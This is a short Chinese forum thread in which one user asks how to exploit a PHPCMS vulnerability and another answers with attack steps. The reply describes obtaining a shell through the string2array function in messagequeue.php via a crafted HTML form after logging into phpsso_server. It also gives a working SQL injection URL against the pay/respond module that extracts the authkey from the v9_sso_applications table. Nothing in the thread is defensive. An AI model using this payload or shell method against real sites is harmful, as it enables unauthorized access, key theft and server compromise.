求问一下此方式怎么利用
http://www.unhonker.com/bug/1907.html这是地址,就是不怎么利用!
RE: 求问一下此方式怎么利用
利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件,登陆phpsso_server后,提交即可。测试时,请修改form的action属性。3、注入。访问链接:【这里是域名】/phpcmsv9/index.php?m=pay&c=respond&a=respond_get&code=kkk%89′ and extractvalue(1, concat(0x7e, (select substr(authkey,1,30) FROM v9_sso_applications where appid=1),0x7e))–%20m
能看懂么?
RE: 求问一下此方式怎么利用
初九、 发表于 2016-9-2 13:11利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另 ...
利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件,登陆phpsso_server后,提交即可。测试时,请修改form的action属性。
这一段我就看不懂了 怎么利用!
页:
[1]